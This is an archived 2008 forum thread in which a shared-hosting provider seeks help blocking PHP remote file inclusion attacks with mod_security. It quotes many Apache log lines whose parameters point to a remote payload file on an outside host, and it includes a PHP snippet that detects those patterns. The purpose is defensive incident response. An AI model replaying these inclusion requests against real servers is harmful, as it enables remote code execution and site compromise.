Solved

Anybody know how to block this specific PHP Inject attack using Mod_Security2 in CPanel  ?

Posted on 2008-06-16
13
1,217 Views
Last Modified: 2012-06-27
Hi,

I would like to request an assistant.

Anybody know how to block the following "WEB-PHP remote include path" attack using mod_security.

I have tried using Default Mod_Securty and also Mod_security from http://www.timmit.nl/modsec2.user.conf.

But it seems that the mod_security did not functioning well in which PHP inject script still able to run on my server.  

The following is the WEB-PHP remote include path that i mentioned about taken from the Apache Access log.


=================================

127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:31 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:23:46 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:23:47 +0800] "GET /?HCL_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 406 346
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:14 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:15 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [15/Jun/2008:15:25:16 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:29:07 +0800] "GET //config.inc.php?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?name=Club&op=members&cid=2//login.php%3fskin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:48:17 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:27 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:51:28 +0800] "GET /?language=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:54:25 +0800] "GET /?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux/9131.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:51 +0800] "GET /linux//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac/9194.html//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET //login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:01:55:57 +0800] "GET /mac//login.php?skin_dir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:19:10 +0800] "GET /?module=pnForum&func=viewtopic&topic=813&=&newlang =deu//phpopenchat/contrib/yabbse/poc.php%3fsourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:11 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:25 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:19:38 +0800] "GET ///modules/My_eGallery/public/displayCategory.php?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:21:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:24:26 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:36 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:24:37 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:20 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:21 +0800] "GET /die.php?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 404 -
127.0.0.1 - - [16/Jun/2008:02:26:29 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:34 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:26:35 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:28:33 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:31:34 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:34:59 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:35:10 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%253f%253f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:37:44 +0800] "GET /?sourcedir=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:38:03 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:40:06 +0800] "GET //index2.php?_REQUEST=&_REQUEST%5boption%5d=com_cont ent&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_abso lute_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt?? HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:02:42:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:02:42:48 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:47 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:02:48:49 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:00:19 +0800] "GET /?_REQUEST=&_REQUEST%255boption%255d=com_content&_R EQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolu te_path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?name=Sitemap//modules/My_eGallery/public/displayCategory.php%3fbasepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:04:12 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:08 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [16/Jun/2008:03:10:09 +0800] "GET /?basepath=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
124.217.243.21 - - [16/Jun/2008:11:16:49 +0800] "GET /kb/php_joomla//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -
124.217.243.21 - - [16/Jun/2008:11:16:50 +0800] "GET /kb//libraries/joomla/application/router.php?path=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 404 -

====================================



Appreciates if anybody can help to stop this attack.  

Thank you,

Regards,
Sham
0
Comment
Question by:smksa
  • 6
  • 5
  • 2
13 Comments
 
LVL 48

Assisted Solution

by:hernst42
hernst42 earned 100 total points
ID: 21800265
0
 
LVL 2

Author Comment

by:smksa
ID: 21800306
But i already disable allow_url_fopen and already installed SUHOSIN .

I do that on 8th June and still the attack happened..

I don't know how to check the domain/hosting involves based on the Apache Access Log.
0
 
LVL 48

Expert Comment

by:hernst42
ID: 21800322
You will still get those things in the log even if mod_security is install. The effect is that the attack won't stop, but nothing happens on your server. Every webserver is under attack from bots/scripts, ... and each attempt is typical logged in the log.
0
 
LVL 2

Author Comment

by:smksa
ID: 21800365
Ehm ....

I think the attack is still happening on my server because i received today a report from my Datacenter that there are hack activity to other server from my server using this PHP Inject method...

Their email is as follows :



-----Original Message-----
From: soc@brasiltelecom.com.br [mailto:soc@brasiltelecom.com.br]
Sent: Monday, June 16, 2008 5:29 AM
Cc: cert@cert.br
Subject: Incident ID: BRT563785 Sent to abuse@piradius.net
Importance: High


Dear Sirs,

   It was detected on Brasil Telecom's monitoring systems that the

 machine listed in this mail has been maliciously used. The traffic details are

below (Note that the date/time is in the format: YYYY-MM-DD HH:MM:SS).

Please respond accordingly to this Incident.


   Therefore the IP 124.217.243.21 will be blocked on all our Data Centers for 60 minutes.

   To reply this e-mail, please keep the ID BRT563785 in the Subject Field.


Thanks,

CSIRT Brasil Telecom
2008-06-15 05:55:43 GMT
124.217.243.21 1:2002 WEB-PHP remote include path


Prezados responsaveis,

   Foi identificado atraves da monitoracao de seguranca da Brasil
Telecom que a maquina listada abaixo esta sendo usada para fins
maliciosos na Internet (Note que a data esta no seguinte formato:
AAAA-MM-DD HH:MM:SS). Favor tomar as acoes cabiveis em relacao ao

Incidente.

   Em virtude disso o IP 124.217.243.21 ficara 60 minutos bloqueado em todos os nossos Data centers.
   Ao responder este e-mail mantenha o ID BRT563785 no campo assunto.


Att,


Brasil Telecom CSIRT

Para maiores Informacoes sobre a(s) atividade(s) detectadas:
For more Informations about the activity visit:

http://www.snort.org/pub-bin/sigs.cgi?sid=1:2002


---

Esta mensagem foi enviada automaticamente pelo SOC - Centro de Operacoes de Seguranca da Brasil Telecom S.A. e pode conter informacoes privilegiadas e/ou de carater confidencial, nao podendo ser retransmitida. Caso mais esclarecimentos ou acoes por parte da equipe de Resposta a Incidentes de Seguranca sejam necessarios, favor contactar o SOC no telefone +55(61)3305-5565 (atendimento 24x7), ou pelo e-mail soc.nivel1@brasiltelecom.com.br.




Really appreciates if anybody can help.
0
 
LVL 29

Assisted Solution

by:fibo
fibo earned 100 total points
ID: 21800646
These attacks are really frequent.
There are 2 aspects to defense:
1 - prevent your site from being hacked
2 - gracefully send this attacks somewhere else

In a similar situation, I was lucky enough to be sure that NO legitimate use of my pages should have any "http://" type of content.
Thus I created a htaccess which returned an error 404 whenever "http://" was detected in the URL argument.
- the advantage is that this redirection, although it uses some CPU from the web server, does not launch any php resource, while at the same time effectively "hiding" these pages from those attacks which try to include code or to report to the "botnet shepherd"

In another situation, there were cases where http:// was in some cases part of a legitimate URL.
Since I am more comfortable on PHP than in mod_rewrite, I created a small php script that was then included at the beginning of each php script.
You might tailor it to your own use. See additional notes after the code
--------------------------
<?php
/** tests sur les hacks >**/
$la_ligne=trim('xxx'. @$_SERVER['QUERY_STRING']);
if (3 < strlen($la_ligne)) {  //search for attack-specific patterns
      $my_ligne= strpos ($la_ligne, 'absolute_p')
            +      strpos ($la_ligne, 'catid=http://')
            +      strpos ($la_ligne, 'option=http://')
            +      strpos ($la_ligne, '_REQUEST')
            +      strpos ($la_ligne, 'password')
            +      strpos ($la_ligne, 'GLOBALS=')
;};
$my_ligne = (0 < $my_ligne);
if ($my_ligne)  { // you might create some more elaborate defensive answers...
   header("HTTP/1.1 404 Not Found");
  exit; //stop processing if attacked
};
unset ($my_get, $la_ligne, $my_ligne, $his_host); //clears the defense variables
//proceed normal activity
?>
--------------------------
Notes on php code:
- put the include at the beginning of your code. be sure that there is no trailing space or other character
- adapt detect and answer to your special case
- this php code uses some CPU resources to run the php script... try to be as fast as possible in case of multiple botnets attacks

General notes:
- your logs show that in most cases the page was successfully run (return code 200), even if the attack itself failed; this tells the robot that it can try some other attack; returning the 404 tells the robot there is nothing to find there: it will then switch to some other page of your site, and later to some other site
- be sure to protect everything that needs to.
-- Usually all dirs should be chmod 705, except directories where file might be uploaded
-- check that every directory has an index file, whether index.htm, index.html or index.php: without an index, the directory might be readable, giving some ideas of scripts etc. The minimum would be an empty index.htm file, but you can put a simple index.php file
<?php
header("HTTP/1.1 301 Moved Permanently");
header("Location: /");
exit;
?>
-- check  that all your script files are chmod 444 (or 544 in some cases), including all your index.* files
-- if you have any 'install', 'installation', 'config' or 'administration' directory... you should probably delete it or (more safely) chmod it to 000; same for script with similar names: chmod them to 000 [you might need some config files to be chmod 400)
-- chase ALL your directories for files which look foreign, just in case one hack succeeded and a trojan is now running on your site... if there are: a/ take (but don't run!) a backup copy; b/ either delete or chmod 000 the file
- in your case, the attack relies on a library of exploits currently hosted on the server http://www.m-comp.nl; in most situations, these sites are legitimate and do not even know that they have been hacked! you should send a mail to postmaster, webmaster and abuse@m-comp.nl giving them the info that your site has been highly attacked by robots trying to force the use of resources extracted from their site, and that they have probably been infected, and that you would appreciate if they could clean this library and any other extra files that a hacker might have put there.
- this part of the log shows that a large number of attacks come from IP address 124.217.243.21 ; you might consider emailing the corresponding ISP http://www.ip-adress.com/whois/124.217.243.21 (but don't hold your breath, this will probably have no impact); anyway, this IP has now been blocked by your ISP and should not bother you anymore
- this part of the log shows also that queries are sent from 127.0.0.1 which is YOUR SERVER, which presumably has already been hacked... some of the suggestions above will probably have cleaned that!

0
 
LVL 2

Author Comment

by:smksa
ID: 21800801
Hi Fibo,

Thanks for the advice.

But this server is actually a shared hosting server using cpanel.

I cannot do it per script basis, those script might belong to our hosting client.
0
Free Trending Threat Insights Every Day

Enhance your security with threat intelligence from the web. Get trending threat insights on hackers, exploits, and suspicious IP addresses delivered to your inbox with our free Cyber Daily.

 
LVL 29

Expert Comment

by:fibo
ID: 21801126
Using cpanel, you have access to the file directories, right?
- You can then check and clean the directories for unwanted "eggs" in your "nest"
- you can add "index.htm" or "index.php" in the directories where needed.
- You can change access right sto the directories



<<I cannot do it per script basis, those script might belong to our hosting client.>>
I presume you mean "hosting provider"
I presume you have installed scripts thru cpanel. The scripts (eg php) present on your site are now "your copy" and you may change them to your will (check that with your provider, of course) although you will get no support for your changes.
Changing php scripts need some php knowledge, but not to be a complete expert.
You might also ask for some (charged) assistance from your provider.
0
 
LVL 2

Author Comment

by:smksa
ID: 21801173
Hi Fibo,

Thanks for your advice again.

But, actually we are the hosting provider and we received the report as the attached email from my previous post saying that our shared hosting server has been used to maliciously hack other people server using PHP Inject Scripts.

I have around 300 domain hosted on the server.

The problems are :

1. I have no idea which scripts or domain that cause the error that make me think mod_security is the best way to block it.

2. I cannot alter my client php file or .htaccess without their knowlege and some more i dont even know which hosting account or scripts that has been used for the PHP inject activities.

Appreciates if you could advice based on that.
0
 
LVL 29

Expert Comment

by:fibo
ID: 21802148
OK. Sorry, I was completely in the wrong direction.

- Are you the piradius.net reported in the mail?
- Is the IP address 124.217.243.21 part of yours? are there specific host on this machine?
- if this is the case, then certainly your server has been hacked. YOU NEED TO BE SURE THIS IS NOT DAMAGING YOUR CUSTOMERTS' SITES...

Some random thoughts/ questions

- mod_security seems to be htaccess/mod rewrite based and I would think you cannot use them without your customers' consent and so should be ruled out as a general solution.

- what does your clients' contract say? who is responsible for their own account security?

- the logs should tell which site is targeted. If this does not appear, it is YOUR site, not theirs, which is under attack. (which does not mean that their logs, if scrutinized, would not exhibit similar attacks against their won site).

- are their site hosted physically on the same machine as yours? are they in the same disk hierarchy, or are yours and theirs distinct? If this is not the case and if this is possible, you should plan for doing that at the first occasion (don't do it under pressure).
- I presume you are taking backup of everything, including their sites. If not, you should  until things sem fairly back to normal: it will ensure that, in case of a major problem, the diruption will be as short as possible.

0
 
LVL 2

Author Comment

by:smksa
ID: 21803957
Hi,

Thanks for the advice and your comment.

Refer to your question :

- Are you the piradius.net reported in the mail?

>> No, piradius.net is our IP provider.

- Is the IP address 124.217.243.21 part of yours? are there specific host on this machine?

>> Yes, 124.217.243.21 is the main shared IP for this server.

- if this is the case, then certainly your server has been hacked. YOU NEED TO BE SURE THIS IS NOT DAMAGING YOUR CUSTOMERTS' SITES...

>> I don't think so, refer to the logs, 127.0.0.1 and 124.217.243.21 is normal when access on APACHE 2.28 webserver . It is the way apache is logged now (New Version). 100++ of my other server also having the same logs style when people accessing the websites hosted on the server.


Some random thoughts/ questions

- mod_security seems to be htaccess/mod rewrite based and I would think you cannot use them without your customers' consent and so should be ruled out as a general solution.

>> We are providing shared hosting service in which for security wise we can alter any of our terms of services and SLA.

- what does your clients' contract say? who is responsible for their own account security?

>> Own account security is off course their responsibility but the overall server setup is our responsibility.

- the logs should tell which site is targeted. If this does not appear, it is YOUR site, not theirs, which is under attack. (which does not mean that their logs, if scrutinized, would not exhibit similar attacks against their won site).

>> No , this is the overall apache server logs that logged everything accessed using apache 2.28.

- are their site hosted physically on the same machine as yours? are they in the same disk hierarchy, or are yours and theirs distinct? If this is not the case and if this is possible, you should plan for doing that at the first occasion (don't do it under pressure).

>> Off course no, we managed more than 5000 hosting account on few of our servers.

- I presume you are taking backup of everything, including their sites. If not, you should  until things sem fairly back to normal: it will ensure that, in case of a major problem, the diruption will be as short as possible.

>> Yes, we have a mirror backup . daily, weekly and monthly backup on separate server.


0
 
LVL 29

Expert Comment

by:fibo
ID: 21805512
OK.
Everything seems fine except your own server.

Therefore, and since your clients' directories are not under your own, you can do "whatever you want" on your own web site: you can change your own script as needed etc.

The problem is then
a - your site, and probably some others as well, are under attacks from one or several hacked sites at IP address 124.217.243.21
b - one of those is most probably your own site (127.0.0.1)
c - you have found no easy way to check which of the sites is/are originating the "sniffing" of the attacks.

My thoughts:
1 - your own site needs to be cleaned, using all or some of my suggestions or equivalent.
2 - Once this is done (ie, you have found and cleaned at least one source of the scripts), check in the logs if the attacks still persist. If no, MAYBE the problem is solved for now. If yes... are there still attacks coming from 127.0.0.1? if no... MAYBE your machine is cured, and some other is not.
3 - To chase other machines: if you have the legal right to do so, look to their sites' logs file: are there other sites under attacks? from which IPs? are there any from 127.0.0.1? if yes, then probably these very sites have been hacked. But here you need to work with your client to clean their sites...

4 - The sites are running on Apache, presumably on Linux. Check the whole disks with anti-viruses. Most recent anti-virus also look for this type of trojan...

Good hunting!
0
 
LVL 2

Accepted Solution

by:
smksa earned 0 total points
ID: 21840122
Hi,

I managed to resolved this issue by using the Mod_security as at :

http://403security.org/files/modsec_rules.txt

Now, there are no more same attempt happening again on this server.
0
 
LVL 29

Expert Comment

by:fibo
ID: 21897319
Thx for the points.
0

Featured Post

How to run any project with ease

Manage projects of all sizes how you want. Great for personal to-do lists, project milestones, team priorities and launch plans.
- Combine task lists, docs, spreadsheets, and chat in one
- View and edit from mobile/offline
- Cut down on emails

Join & Write a Comment

If you don't have the right permissions set for your WordPress location in IIS, you won't be able to perform automatic updates. Here's how to fix the problem.
Nothing in an HTTP request can be trusted, including HTTP headers and form data.  A form token is a tool that can be used to guard against request forgeries (CSRF).  This article shows an improved approach to form tokens, making it more difficult to…
Learn how to match and substitute tagged data using PHP regular expressions. Demonstrated on Windows 7, but also applies to other operating systems. Demonstrated technique applies to PHP (all versions) and Firefox, but very similar techniques will w…
The viewer will learn how to dynamically set the form action using jQuery.

747 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

12 Experts available now in Live!

Get 1:1 Help Now